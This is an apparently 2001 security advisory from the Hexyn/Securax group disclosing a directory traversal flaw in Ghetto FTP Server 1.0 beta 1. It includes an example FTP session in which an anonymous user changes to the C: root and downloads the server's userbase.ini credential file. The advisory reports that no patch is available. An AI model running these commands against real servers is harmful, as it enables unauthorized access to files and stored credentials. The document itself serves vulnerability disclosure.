Hexyn / Securax Advisory #16 - Ghetto FTP Server Directory Traversal Topic: Ghetto FTP Server Directory Traversal Announced: 2001-02-17 Affects: Ghetto FTP Server version 1.0 beta 1 DISCLAIMER: *********** THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS. THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS 100% CORRECT. THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR NOTICE. I. Problem Description ********************** G6 FTP Server is an FTP server for Windows 9x/NT. A bug allows any user to change to c:\ and sub directories. II. Impact ************** When sending the command "CWD /" (or "cd /" in the default UNIX FTP client), Ghetto FTP will change to c:\. Example: -------- 230 User anonymous logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd / 250 CWD command successful. ftp> ls 200 PORT command successful. 150 Opening ASCII mode data connection for /. ftp> GET /Program Files/CorbaSoft/GFTPS/userbase.ini local: userbase.ini remote: userbase.ini 200 PORT command successful. 150 Opening BINARY mode data connection. 226 Transfer complete. 3048 bytes received in 0.214 secs (14 Kbytes/sec) ftp> quit 221 Bye. III. Solution ************* At this time, no patch is available yet. IV. Credits *********** Bug discovered by t-Omicr0n Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel, oPr, Reggie, F_F, Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3, Preat0r, T0SH, zeroX, AreS, tips, Lacrima, GigaByte and everyone at #securax@irc.hexyn.be -- t-Omicr0n @ http://t-Omicr0n.hexyn.be